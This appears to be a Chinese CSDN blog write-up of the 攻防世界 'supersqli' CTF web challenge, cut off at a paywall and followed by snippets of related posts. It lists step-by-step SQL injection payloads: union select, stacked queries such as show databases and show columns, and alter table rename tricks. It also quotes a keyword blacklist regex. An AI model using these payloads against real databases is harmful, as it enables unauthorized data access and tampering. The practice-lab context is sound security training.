攻防世界 supersqli

最新推荐文章于 2023-06-28 07:58:15 发布
最新推荐文章于 2023-06-28 07:58:15 发布
阅读量116 收藏 1
点赞数
分类专栏: web安全 文章标签: 数据库 sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51744055/article/details/124557380
版权

输入1’ 不回显,输入1’# 显示正常。应该存在sql注入

根据 1’ and 1=1判断

 

1’ order by 2#

发现有两列

order by 3时候报错

 

输入

联合查询

1’ union select 1,database()#

 

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

 

返回黑名单

 

堆叠注入:

--+要在url中输入,hackerbar,输入框中对--+进行过滤
‘;show databases;--+

 

查表

‘;show tables;--+

 

 

在两个表中查列

';show columns from  `1919810931114514` ;--+

; show columns from `words` ;--+

 

 

查看字段:

 

更改表名:
words表中发现id的字段和查询框中的数据类型相同,一个数字,一个子字符串

猜测查询的就是words表,搜索框中的值给了id

 

 

把含有flag字段的表改名为words,修改字段名字

(前提是rename,alert没被过滤)

 

uploading.4e448015.gif正在上传…重新上传取消

 

 

 

alter table words rename to words1;

最低0.47元/天 解锁文章
759518
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
数字型SQL注入学习
weixin_38608231的博客
08-08 5171
MYSQL为例子说明,SQL注入的形成原理是没有对用户输入的数据进行过滤和转义,使得用户的数据被SQL解释器执行。 数字型的注入特征是当输入的参数为整型时,如:ID,年龄,页码等,若存在注入漏洞,则可认为是数字型注入。数字型的注入多存在ASP与PHP等弱类型中。 一、有回显的SQL注入(报错注入) 1.判断是否存在注入点 判断是否存在注入点最常见的做法是利用单引号,即“ ' ”。因为当你...
【极客大挑战 2019】EasySQL
Knsec
05-13 8623
[极客大挑战 2019] EasySQL 判断是数字还是字符型注入 正常查询的回显 输入字符型判断一下,发现报错了,看报错显示 ‘1’‘’,输入的是1’,这里查询语句中应该是存在一个单引号的,所以这里报错了,多了一个单引号,说明这里存在字符型的注入,先用万能钥匙测测 使用万能钥匙一测,第一次 正常回显错误,然后又用字符型的测了一下,发现这里的报错中带有 一部分的查询语句 # 万能公式 1 and 1=1 1' and '1'='1 1 or 1=1 1' or '1'='1
CTF第七天
qq_52680097的博客
05-31 187
[强网杯 2019]随便注 1 先打这个 1' and 1=1#和 1' and 1=2# 返回结果不同,说明有sql注入 再打1' or 1=1# 虽然不知道这些信息有啥用 再看看有几列 当输入1' order by 3#时返回了报错信息,说明只有2列 接下来试试堆叠注入 堆叠注入原理 在sql中,分号表示一条语句的结束。如果在分号的后面再加一条语句,这条语句也可以被执行,继续加一个分号和一条语句,这样就可以在一次数据库的调用中执行多个语句。 mysql> select * from user
CTFhub Cookie注入
plant1234的博客
06-18 731
Cookie注入: 首先更具题目启动环境得到: 发现这是cookie注入,于是就利用bp抓包得到: 发现cookie 能传参数,于是传入: 2 1’ 1 and 1=1 1’ and 1=1# 1 and 1=2 得到: 可以看到在1’ ,1’ and 1=1 ,1 and 1=2 出没有回显 在1 and 1=1 处得到正确回显 所以是存在注入的 于是用语句查看字段数: 看到有3报错,所以有两个字段 于是去得到当前库名: 在得到表名: ...
过滤select|update|delete|drop|insert|where的注入 [ 强网杯 2019]随便注
lonmar的博客
04-08 4574
转载于 攻防世界WP https://adworld.xctf.org.cn/task/writeup?type=web&id=5417&number=3&grade=1&page=1 题目链接https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=541...
攻防世界 supersqli writeup
12-14
发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127952541
攻防世界-Web高手进阶区-supersqli(强网杯的随便注)
feng的博客
09-14 1485
前言 此题可谓是奇技淫巧甚多,之前做过一次,不过当时没有写WP。今天偶然又看到了这个题目,打开环境发现又有些不会,因此又把这题相关的知识点和各种技巧看了一遍,写下这篇WP。 WP 首先进入环境,发现是SQL注入。我们先简单的进行一些测试,发现是字符型注入,因此加一个单引号然后后面加#来闭合,然后测试1=1,1=2,发现都可以,然后进行order by测试,发现是2。但是在进行union注入的时候出现: return preg_match("/select|update|delete|drop|insert|
堆叠注入之[强网杯 2019]随便注
Aiwin的博客
05-26 665
堆叠注入之[强网杯 2019]随便注各详解
攻防世界web高手区supersqli解法(详细)
qq_53105813的博客
05-25 1755
supersqli 翻译一下为超级数据库 打开题目很明显,直接想到sql注入 验证一下猜想 提交 1’ and 1=1#和1‘ and 1=2#(输入框中没有显示在url中) 说明存在注入漏洞 接下来用order by判断字段 提交 1'order by 2# 提交 1'order by 3# 说明只有两个字段爆出 接下来尝试爆数据库名 提交: 1'union select 1,database()# 返回错误信息 return preg_mat...
sql注入学习分享
这个时代,作为程序员可能要学习小程序
09-25 360
点击上方关注 “终端研发部”设为“星标”,和你一起掌握更多数据库知识WEB框架web应用一改我们平时常见的 p2p 和 C/S 模式,采用 B/S 模式。随着网络技术的发展,特别随着Web技术的不断成熟,B/S 这种软件体系结构出现了。浏览器-服务器(Browser/Server)结构,简称 B/S 结构,与 C/S不同,其客户端不需要安装专门的软件,只需要浏览器即可,浏览器与Web服务器交互,W...
SQL注入】字符型注入
noob_3000的博客
08-07 536
SQL字符型注入
sql注入-堆叠+二次
xiaoheizi的博客
06-28 282
判断字段,结果提示return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);首先启动并访问靶机,有一个输入框,随便输入1',发现报错了,说明可能存在sql注入。更新操作,把七个表的数据全部更新到一个总表中,因为我们在教育经历模块填写了(在创建简历时候有七个模块,每次填写完一个模块点击保存后——数据库会执行一次。打开网站会员中心,点击创建简历,填写信息,一直到教育经历。查询操作,把总表中的内容在页面展示出来,因为。
渗透测试 | SQL注入字符注入详解
yu_19980401的博客
11-17 2100
SQL注入详解 SQL注入的概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 字符注入 后台语句模板 SELECT first_name,last_name FROM users WHERE user_id = ‘$id’; 正常访问 SELECT first_name,last_name FROM users WHERE user_id = ‘1’; 构造SQL注入语句 SELECT firs_name,last_name FROM user
攻防世界 supersqli(堆叠注入)
m0_56107268的博客
05-04 1803
1.首先判断有无注入点: 1’ and 1=1 # 1' and 1=2 # 2.进行注入 判断字段数 1' order by 2 # //两个字段 判断字段注入点 1' union select 1,2 # 出现一个正则替换 查看其他人博客,发现是使用堆叠注入 堆叠注入原理? mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠注入其实就是通过结束符来执行多条sql语句 堆叠注入触发条件 堆叠注入触发的条件很
ctf刷题之web buuctf
dwrnxjlove的博客
07-10 413
ctf刷题之webbuuctf 目录ctf刷题之webbuuctfWarmUp WarmUp 打开题目之后是一个表情,从页面上没有看出什么东西,于是查看网页源代码,发现里面有一个注释掉的source.php东西,必须好奇的进去看看: 进入之后是一段php代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) {
攻防世界supersqli
最新发布
08-09
Supersqli是一种强大的SQL注入攻击技术,它可以绕过应用程序的安全机制并获取未经授权的访问权限。攻击者可以通过在应用程序的输入字段中插入恶意的SQL代码,来执行未经授权的数据库操作。 为了防御Supersqli攻击,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值